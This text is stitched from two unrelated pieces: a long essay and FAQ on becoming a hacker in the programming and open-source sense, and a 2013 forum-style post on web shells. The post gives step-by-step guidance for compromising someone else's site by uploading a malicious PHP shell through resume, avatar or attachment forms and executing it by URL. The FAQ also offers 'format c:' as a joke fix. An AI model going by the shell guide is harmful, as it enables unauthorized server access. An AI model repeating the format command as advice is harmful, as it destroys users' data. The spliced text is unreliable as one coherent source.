To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.

Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.

If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.

Basic Hacking Skills

1. Learn how to program.
2. Get one of the open-source Unixes and learn to use and run it.
3. Learn how to use the World Wide Web and write HTML.
4. If you don't have functional English, learn it.
The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.

This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following:

1. Learn how to program.

This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed evaluation of Python. Good tutorials are available at the Python web site.

I used to recommend Java as a good language to learn early, but this critique has changed my mind (search for “The Pitfalls of Java as a First Programming Language” within it). A hacker cannot, as they devastatingly put it “approach problem-solving like a plumber in a hardware store”; you have to know what the components actually do. Now I think it is probably best to learn C and Lisp first, then Java.

There is perhaps a more general point here. If a language does too much for you, it may be simultaneously a good tool for production and a bad one for learning. It's not only languages that have this problem; web application frameworks like RubyOnRails, CakePHP, Django may make it too easy to reach a superficial sort of understanding that will leave you without resources when you have to tackle a hard problem, or even just debug the solution to an easy one.

If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.

C is very efficient, and very sparing of your machine's resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today's machines as powerful as they are, this is usually a bad tradeoff — it's smarter to use a language that uses the machine's time less efficiently, but your time much more efficiently. Thus, Python.

Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don't require C's machine efficiency. You will need to be able to understand their code.

LISP is worth learning for a different reason — the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor, or Script-Fu plugins for the GIMP.)

It's best, actually, to learn all five of Python, C/C++, Java, Perl, and LISP. Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.

But be aware that you won't reach the skill level of a hacker or even merely a programmer simply by accumulating languages — you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages.

I can't give complete instructions on how to learn to program here — it's a complex skill. But I can tell you that books and courses won't do it — many, maybe most of the best hackers are self-taught. You can learn language features — bits of knowledge — from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) reading code and (b) writing code.

Peter Norvig, who is one of Google's top hackers and the co-author of the most widely used textbook on AI, has written an excellent essay called Teach Yourself Programming in Ten Years. His "recipe for programming success" is worth careful attention.

Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models.

Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic...

2. Get one of the open-source Unixes and learn to use and run it.

I'll assume you have a personal computer or can get access to one. (Take a moment to appreciate how much that means. The hacker culture originally evolved back when computers were so expensive that individuals could not own them.) The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes, install it on a personal machine, and run it.

Yes, there are other operating systems in the world besides Unix. But they're distributed in binary — you can't read the code, and you can't modify it. Trying to learn to hack on a Microsoft Windows machine or under any other closed-source system is like trying to learn to dance while wearing a body cast.

Under Mac OS X it's possible, but only part of the system is open source — you're likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple's proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.

Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers still aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.)

So, bring up a Unix — I like Linux myself but there are other ways (and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker.

For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.

To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation.

During the first ten years of this HOWTO's life, I reported that from a new user's point of view, all Linux distributions are almost equivalent. But in 2006-2007, an actual best choice emerged: Ubuntu. While other distros have their own areas of strength, Ubuntu is far and away the most accessible to Linux newbies. Beware, though, of the hideous and nigh-unusable "Unity" desktop interface that Ubuntu introduced as a default a few years later; the Xubuntu or Kubuntu variants are better.

You can find BSD Unix help and resources at www.bsd.org.

A good way to dip your toes in the water is to boot up what Linux fans call a live CD, a distribution that runs entirely off a CD without having to modify your hard disk. This will be slow, because CDs are slow, but it's a way to get a look at the possibilities without having to do anything drastic.

I have written a primer on the basics of Unix and the Internet.

I used to recommend against installing either Linux or BSD as a solo project if you're a newbie. Nowadays the installers have gotten good enough that doing it entirely on your own is possible, even for a newbie. Nevertheless, I still recommend making contact with your local Linux user's group and asking for help. It can't hurt, and may smooth the process.

3. Learn how to use the World Wide Web and write HTML.

Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit has changed the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.

This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; here's one.)

But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge — very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).

To be worthwhile, your page must have content — it must be interesting and/or useful to other hackers. And that brings us to the next topic...

4. If you don't have functional English, learn it.

As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.

Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).

Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It's an example worth following.

Being a native English-speaker does not guarantee that you have language skills good enough to function as a hacker. If your writing is semi-literate, ungrammatical, and riddled with misspellings, many hackers (including myself) will tend to ignore you. While sloppy writing does not invariably mean sloppy thinking, we've generally found the correlation to be strong — and we have no use for sloppy thinkers. If you can't yet write competently, learn to.

Status in the Hacker Culture

1. Write open-source software
2. Help test and debug open-source software
3. Publish useful information
4. Help keep the infrastructure working
5. Serve the hacker culture itself
Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.

Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (gradually decaying since the late 1990s but still potent) against admitting that ego or external validation are involved in one's motivation at all.

Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.

There are basically five kinds of things you can do to be respected by hackers:

1. Write open-source software

The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.

(We used to call these works “free software”, but this confused too many people who weren't sure exactly what “free” was supposed to mean. Most of us now prefer the term “open-source” software).

Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.

But there's a bit of a fine historical point here. While hackers have always looked up to the open-source developers among them as our community's hardest core, before the mid-1990s most hackers most of the time worked on closed source. This was still true when I wrote the first version of this HOWTO in 1996; it took the mainstreaming of open-source software after 1997 to change things. Today, "the hacker community" and "open-source developers" are two descriptions for what is essentially the same culture and population — but it is worth remembering that this was not always so. (For more on this, see the section called “Historical Note: Hacking, Open Source, and Free Software”.)

2. Help test and debug open-source software

They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance.

If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on.

3. Publish useful information

Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.

Maintainers of major technical FAQs get almost as much respect as open-source authors.

4. Help keep the infrastructure working

The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs done to keep it going — administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.

People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.

5. Serve the hacker culture itself

Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be positioned to do until you've been around for while and become well-known for one of the first four things.

The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.

The Hacker/Nerd Connection

Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being something of a social outcast helps you stay concentrated on the really important things, like thinking and hacking.

For this reason, many hackers have adopted the label ‘geek’ as a badge of pride — it's a way of declaring their independence from normal social expectations (as well as a fondness for other things like science fiction and strategy games that often go with being a hacker). The term 'nerd' used to be used this way back in the 1990s, back when 'nerd' was a mild pejorative and 'geek' a rather harsher one; sometime after 2000 they switched places, at least in U.S. popular culture, and there is now even a significant geek-pride culture among people who aren't techies.

If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.

If you're attracted to hacking because you don't have a life, that's OK too — at least you won't have trouble concentrating. Maybe you'll get a life later on.

Points For Style

Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.

Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.

Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).

Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it's legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.

Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn't require you to believe crazy things.

Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.

Develop your appreciation of puns and wordplay.

The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.

Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it.

Finally, a few things not to do.

Don't use a silly, grandiose user ID or screen name.

Don't get in flame wars on Usenet (or anywhere else).

Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does.

Don't post or email writing that's full of spelling errors and bad grammar.

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.

The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.

Historical Note: Hacking, Open Source, and Free Software

When I originally wrote this how-to in late 1996, some of the conditions around it were very different from the way they look today. A few words about these changes may help clarify matters for people who are confused about the relationship of open source, free software, and Linux to the hacker community. If you are not curious about this, you can skip straight to the FAQ and bibliography from here.

The hacker ethos and community as I have described it here long predates the emergence of Linux after 1990; I first became involved with it around 1976, and, its roots are readily traceable back to the early 1960s. But before Linux, most hacking was done on either proprietary operating systems or a handful of quasi-experimental homegrown systems like MIT's ITS that were never deployed outside of their original academic niches. While there had been some earlier (pre-Linux) attempts to change this situation, their impact was at best very marginal and confined to communities of dedicated true believers which were tiny minorities even within the hacker community, let alone with respect to the larger world of software in general.

What is now called "open source" goes back as far as the hacker community does, but until 1985 it was an unnamed folk practice rather than a conscious movement with theories and manifestos attached to it. This prehistory ended when, in 1985, arch-hacker Richard Stallman ("RMS") tried to give it a name — "free software". But his act of naming was also an act of claiming; he attached ideological baggage to the "free software" label which much of the existing hacker community never accepted. As a result, the "free software" label was loudly rejected by a substantial minority of the hacker community (especially among those associated with BSD Unix), and used with serious but silent reservations by a majority of the remainder (including myself).

Despite these reservations, RMS's claim to define and lead the hacker community under the "free software" banner broadly held until the mid-1990s. It was seriously challenged only by the rise of Linux. Linux gave open-source development a natural home. Many projects issued under terms we would now call open-source migrated from proprietary Unixes to Linux. The community around Linux grew explosively, becoming far larger and more heterogenous than the pre-Linux hacker culture. RMS determinedly attempted to co-opt all this activity into his "free software" movement, but was thwarted by both the exploding diversity of the Linux community and the public skepticism of its founder, Linus Torvalds. Torvalds continued to use the term "free software" for lack of any alternative, but publicly rejected RMS's ideological baggage. Many younger hackers followed suit.

In 1996, when I first published this Hacker HOWTO, the hacker community was rapidly reorganizing around Linux and a handful of other open-source operating systems (notably those descended from BSD Unix). Community memory of the fact that most of us had spent decades developing closed-source software on closed-source operating systems had not yet begun to fade, but that fact was already beginning to seem like part of a dead past; hackers were, increasingly, defining themselves as hackers by their attachments to open-source projects such as Linux or Apache.

The term "open source", however, had not yet emerged; it would not do so until early 1998. When it did, most of hacker community adopted it within the following six months; the exceptions were a minority ideologically attached to the term "free software". Since 1998, and especially after about 2003, the identification of 'hacking' with 'open-source (and free software) development' has become extremely close. Today there is little point in attempting to distinguish between these categories, and it seems unlikely that will change in the future.

It is worth remembering, however, that this was not always so.

Other Resources

Paul Graham has written an essay called Great Hackers, and another on Undergraduation, in which he speaks much wisdom.

There is a document called How To Be A Programmer that is an excellent complement to this one. It has valuable advice not just about coding and skillsets, but about how to function on a programming team.

I have also written A Brief History Of Hackerdom.

I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even more directly in its sequel Homesteading the Noosphere.

Rick Moen has written an excellent document on how to run a Linux user group.

Rick Moen and I have collaborated on another document on How To Ask Smart Questions. This will help you seek assistance in a way that makes it more likely that you will actually get it.

If you need instruction in the basics of how personal computers, Unix, and the Internet work, see The Unix and Internet Fundamentals HOWTO.

When you release software or write patches for software, try to follow the guidelines in the Software Release Practice HOWTO.

If you enjoyed the Zen poem, you might also like Rootless Root: The Unix Koans of Master Foo.

Frequently Asked Questions

Q: How do I tell if I am already a hacker?
Q: Will you teach me how to hack?
Q: How can I get started, then?
Q: When do you have to start? Is it too late for me to learn?
Q: How long will it take me to learn to hack?
Q: Is Visual Basic a good language to start with?
Q: Would you help me to crack a system, or teach me how to crack?
Q: How can I get the password for someone else's account?
Q: How can I break into/read/monitor someone else's email?
Q: How can I steal channel op privileges on IRC?
Q: I've been cracked. Will you help me fend off further attacks?
Q: I'm having problems with my Windows software. Will you help me?
Q: Where can I find some real hackers to talk with?
Q: Can you recommend useful books about hacking-related subjects?
Q: Do I need to be good at math to become a hacker?
Q: What language should I learn first?
Q: What kind of hardware do I need?
Q: I want to contribute. Can you help me pick a problem to work on?
Q: Do I need to hate and bash Microsoft?
Q: But won't open-source software leave programmers unable to make a living?
Q: Where can I get a free Unix?
Q:

How do I tell if I am already a hacker?

A:

Ask yourself the following three questions:

Do you speak code, fluently?

Do you identify with the goals and values of the hacker community?

Has a well-established member of the hacker community ever called you a hacker?

If you can answer yes to all three of these questions, you are already a hacker. No two alone are sufficient.

The first test is about skills. You probably pass it if you have the minimum technical skills described earlier in this document. You blow right through it if you have had a substantial amount of code accepted by an open-source development project.

The second test is about attitude. If the five principles of the hacker mindset seemed obvious to you, more like a description of the way you already live than anything novel, you are already halfway to passing it. That's the inward half; the other, outward half is the degree to which you identify with the hacker community's long-term projects.

Here is an incomplete but indicative list of some of those projects: Does it matter to you that Linux improve and spread? Are you passionate about software freedom? Hostile to monopolies? Do you act on the belief that computers can be instruments of empowerment that make the world a richer and more humane place?

But a note of caution is in order here. The hacker community has some specific, primarily defensive political interests — two of them are defending free-speech rights and fending off "intellectual-property" power grabs that would make open source illegal. Some of those long-term projects are civil-liberties organizations like the Electronic Frontier Foundation, and the outward attitude properly includes support of them. But beyond that, most hackers view attempts to systematize the hacker attitude into an explicit political program with suspicion; we've learned, the hard way, that these attempts are divisive and distracting. If someone tries to recruit you to march on your capitol in the name of the hacker attitude, they've missed the point. The right response is probably “Shut up and show them the code.”

The third test has a tricky element of recursiveness about it. I observed in the section called “What Is a Hacker?” that being a hacker is partly a matter of belonging to a particular subculture or social network with a shared history, an inside and an outside. In the far past, hackers were a much less cohesive and self-aware group than they are today. But the importance of the social-network aspect has increased over the last thirty years as the Internet has made connections with the core of the hacker subculture easier to develop and maintain. One easy behavioral index of the change is that, in this century, we have our own T-shirts.

Sociologists, who study networks like those of the hacker culture under the general rubric of "invisible colleges", have noted that one characteristic of such networks is that they have gatekeepers — core members with the social authority to endorse new members into the network. Because the "invisible college" that is hacker culture is a loose and informal one, the role of gatekeeper is informal too. But one thing that all hackers understand in their bones is that not every hacker is a gatekeeper. Gatekeepers have to have a certain degree of seniority and accomplishment before they can bestow the title. How much is hard to quantify, but every hacker knows it when they see it.

Q:

Will you teach me how to hack?

A:

Since first publishing this page, I've gotten several requests a week (often several a day) from people to "teach me all about hacking". Unfortunately, I don't have the time or energy to do this; my own hacking projects, and working as an open-source advocate, take up 110% of my time.

Even if I did, hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you beg to be spoon-fed everything they know.

Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with specific questions.

If you do email a hacker asking for advice, here are two things to know up front. First, we've found that people who are lazy or careless in their writing are usually too lazy and careless in their thinking to make good hackers — so take care to spell correctly, and use good grammar and punctuation, otherwise you'll probably be ignored. Secondly, don't dare ask for a reply to an ISP account that's different from the account you're sending from; we find people who do that are usually thieves using stolen accounts, and we have no interest in rewarding or assisting thievery.

Q:

How can I get started, then?

A:

The best way for you to get started would probably be to go to a LUG (Linux user group) meeting. You can find such groups on the LDP General Linux Information Page; there is probably one near you, possibly associated with a college or university. LUG members will probably give you a Linux if you ask, and will certainly help you install one and get started.

Q:

When do you have to start? Is it too late for me to learn?

A:

Any age at which you are motivated to start is a good age. Most people seem to get interested between ages 15 and 20, but I know of exceptions in both directions.

Q:

How long will it take me to learn to hack?

A:

That depends on how talented you are and how hard you work at it. Most people who try can acquire a respectable skill set in eighteen months to two years, if they concentrate. Don't think it ends there, though; in hacking (as in many other fields) it takes about ten years to achieve mastery. And if you are a real hacker, you will spend the rest of your life learning and perfecting your craft.

Q:

Is Visual Basic a good language to start with?

A:

If you're asking this question, it almost certainly means you're thinking about trying to hack under Microsoft Windows. This is a bad idea in itself. When I compared trying to learn to hack under Windows to trying to learn to dance while wearing a body cast, I wasn't kidding. Don't go there. It's ugly, and it never stops being ugly.

There is a specific problem with Visual Basic; mainly that it's not portable. Though there is a prototype open-source implementations of Visual Basic, the applicable ECMA standards don't cover more than a small set of its programming interfaces. On Windows most of its library support is proprietary to a single vendor (Microsoft); if you aren't extremely careful about which features you use — more careful than any newbie is really capable of being — you'll end up locked into only those platforms Microsoft chooses to support. If you're starting on a Unix, much better languages with better libraries are available. Python, for example.

Also, like other Basics, Visual Basic is a poorly-designed language that will teach you bad programming habits. No, don't ask me to describe them in detail; that explanation would fill a book. Learn a well-designed language instead.

One of those bad habits is becoming dependent on a single vendor's libraries, widgets, and development tools. In general, any language that isn't fully supported under at least Linux or one of the BSDs, and/or at least three different vendors' operating systems, is a poor one to learn to hack in.

Q:

Would you help me to crack a system, or teach me how to crack?

A:

No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness.

Q:

How can I get the password for someone else's account?

A:

This is cracking. Go away, idiot.

Q:

How can I break into/read/monitor someone else's email?

A:

This is cracking. Get lost, moron.

Q:

How can I steal channel op privileges on IRC?

A:

This is cracking. Begone, cretin.

Q:

I've been cracked. Will you help me fend off further attacks?

A:

No. Every time I've been asked this question so far, it's been from some poor sap running Microsoft Windows. It is not possible to effectively secure Windows systems against crack attacks; the code and architecture simply have too many flaws, which makes securing Windows like trying to bail out a boat with a sieve. The only reliable prevention starts with switching to Linux or some other operating system that is designed to at least be capable of security.

Q:

I'm having problems with my Windows software. Will you help me?

A:

Yes. Go to a DOS prompt and type "format c:". Any problems you are experiencing will cease within a few minutes.

Q:

Where can I find some real hackers to talk with?

A:

The best way is to find a Unix or Linux user's group local to you and go to their meetings (you can find links to several lists of user groups on the LDP site at ibiblio).

(I used to say here that you wouldn't find any real hackers on IRC, but I'm given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.)

Q:

Can you recommend useful books about hacking-related subjects?

A:

I maintain a Linux Reading List HOWTO that you may find helpful. The Loginataka may also be interesting.

For an introduction to Python, see the tutorial on the Python site.

Q:

Do I need to be good at math to become a hacker?

A:

No. Hacking uses very little formal mathematics or arithmetic. In particular, you won't usually need trigonometry, calculus or analysis (there are exceptions to this in a handful of specific application areas like 3-D computer graphics). Knowing some formal logic and Boolean algebra is good. Some grounding in finite mathematics (including finite-set theory, combinatorics, and graph theory) can be helpful.

Much more importantly: you need to be able to think logically and follow chains of exact reasoning, the way mathematicians do. While the content of most mathematics won't help you, you will need the discipline and intelligence to handle mathematics. If you lack the intelligence, there is little hope for you as a hacker; if you lack the discipline, you'd better grow it.

I think a good way to find out if you have what it takes is to pick up a copy of Raymond Smullyan's book What Is The Name Of This Book?. Smullyan's playful logical conundrums are very much in the hacker spirit. Being able to solve them is a good sign; enjoying solving them is an even better one.

Q:

What language should I learn first?

A:

XHTML (the latest dialect of HTML) if you don't already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide.

But HTML is not a full programming language. When you're ready to start programming, I would recommend starting with Python. You will hear a lot of people recommending Perl, but it's harder to learn and (in my opinion) less well designed.

C is really important, but it's also much more difficult than either Python or Perl. Don't try to learn it first.

Windows users, do not settle for Visual Basic. It will teach you bad habits, and it's not portable off Windows. Avoid.

Q:

What kind of hardware do I need?

A:

It used to be that personal computers were rather underpowered and memory-poor, enough so that they placed artificial limits on a hacker's learning process. This stopped being true in the mid-1990s; any machine from an Intel 486DX50 up is more than powerful enough for development work, X, and Internet communications, and the smallest disks you can buy today are plenty big enough.

The important thing in choosing a machine on which to learn is whether its hardware is Linux-compatible (or BSD-compatible, should you choose to go that route). Again, this will be true for almost all modern machines. The only really sticky areas are modems and wireless cards; some machines have Windows-specific hardware that won't work with Linux.

There's a FAQ on hardware compatibility; the latest version is here.

Q:

I want to contribute. Can you help me pick a problem to work on?

A:

No, because I don't know your talents or interests. You have to be self-motivated or you won't stick, which is why having other people choose your direction almost never works.

Try this. Watch the project announcements scroll by on Freshmeat for a few days. When you see one that makes you think "Cool! I'd like to work on that!", join it.

Q:

Do I need to hate and bash Microsoft?

A:

No, you don't. Not that Microsoft isn't loathsome, but there was a hacker culture long before Microsoft and there will still be one long after Microsoft is history. Any energy you spend hating Microsoft would be better spent on loving your craft. Write good code — that will bash Microsoft quite sufficiently without polluting your karma.

Q:

But won't open-source software leave programmers unable to make a living?

A:

This seems unlikely — so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be open-source after it's done. And, no matter how much "free" software gets written, there always seems to be more demand for new and customized applications. I've written more about this at the Open Source pages.

Q:

Where can I get a free Unix?

A:

If you don't have a Unix installed on your machine yet, elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now...

Basics about Shells

2013-07-18T02:00:00.000-07:00

I am sure many have you have read about "Hacked / Defaced with shells", So I am pretty sure that the first thing that comes to your mind is "What the heck are these shells?" . So this article would give you complete idea about shells and its use.

I will soon write about "RFI, LFI" which are somewhat connected with shells. Meanwhile, keep playing with it and learn more. As without practice you won't get anything.

Difference between FTP & Shells:

Many times I see that some of us know how to use the shell but once they have uploaded they get confused. So to start with, Let me give you some information about FTP:

File Transfer Protocol

Whenever you want to open your website, the first thing you will do is to get some web hosting for your self. That cud be either free or paid. When your get your hosting services, you create a website on your computer first and then upload it to your hosting server so it becomes a World Wide Web. This process of uploading the documents from your computer to your hosting server is done through FTP [File Transfer Protocol]. It basically looks like a program with 2 columns, one column shows your computer files and another shows your servers files. Just like when you copy the stuffs from some USB drive to your computer. So here, I will show you an example is how you would connect if you own example.com. So when you want to connect your self to your web hosting server, following information is required in order to authenticate yourself:

Server : ftp.example.com
Username: XEO
Password: whatever

So, once you put in this information, server understands that you are XEO and gives you access to all the files on the server so you can work on it.

Shells

Since you understand the FTP now, we know that none of us will get access to Go4expert's server because we don't have the username and password authenticate yourself. Somehow we can manage to get the access to G4E's FTP we can easily remove/edit/replace files. So we can destroy this entire forum and upload our own stuffs. That is when shells comes into the picture. Shells are a malicious PHP files which you will need to upload to any website, and once you execute it you will get access to its server directly WITHOUT authenticating your self.

Moral of the Story:

I wrote the difference between FTP and shells so that you guyz can understand it, because lots of people tends to get confused between them. So again to make it clear, you can following thing:

FTP is a protocol that lets you connect your computer to your hosting server so that you can upload/edit/delete/replace your files. Since we wouldn't have the username & password to connect to any website's ftp, thats why we will use the SHELL to get access. SO SHELL IS NOT FTP BUT IT GIVES YOU ACCESS TO THE HOSTING SERVER.

Funny Incidents:

Let me tell you guyz why i gave time to write this much about FTP in this article.I remember i saw couple of threads which said following thing:

"Hi guyz, i managed to hack my 1st website today! YAY, I am really happy! But theres only 1 problem, i uploaded the shell and ran it and it worked fine. The only problem is i dont have access to FTP."

Y0, i hacked a website today, uploaded a shell and it worked fine, now i am trying to get access to FTP

Main Logic

Shell is not a tool that you can run and complete your work. As I said, its just a normal ".php" file, you have to find a way in any website to upload that shell. The Idea is, you upload the shell to any website so it will be saved on their server and it will give you the access to it.

Phase 1 : Uploading a shell:

Suppose you want to hack "something.com". So the first thing that you will do is, open up "something.com", and try to find some place from where you can upload the files on the website. There are many such places for example, "file uploads, avatars, resume upload, cooking recipe uploads, upload your photo". So these are the places which will give you an opportunity to upload your shell. All you have to do is, try to upload the shell.php which is located in your computer and click on submit. So suppose you went to the webpage "something.com/submit_resume.php" and you uploaded your resume.

Phase 2 : Executing your uploaded shelll:

Once we have uploaded the shell as shown in "Phase:1", we know that its sitting on the server. The only thing we need to do now is to execute the shell from a browser so we get access to it.

Example:

So suppose i uploaded my shell as an attachment in any thread. SO now that attachment is sitting on that thread's server. Now if we want to executive it, we will use following URL:

Code: http://www.something.com/forums/attachment.php?attachmentid=456&d=1249607339

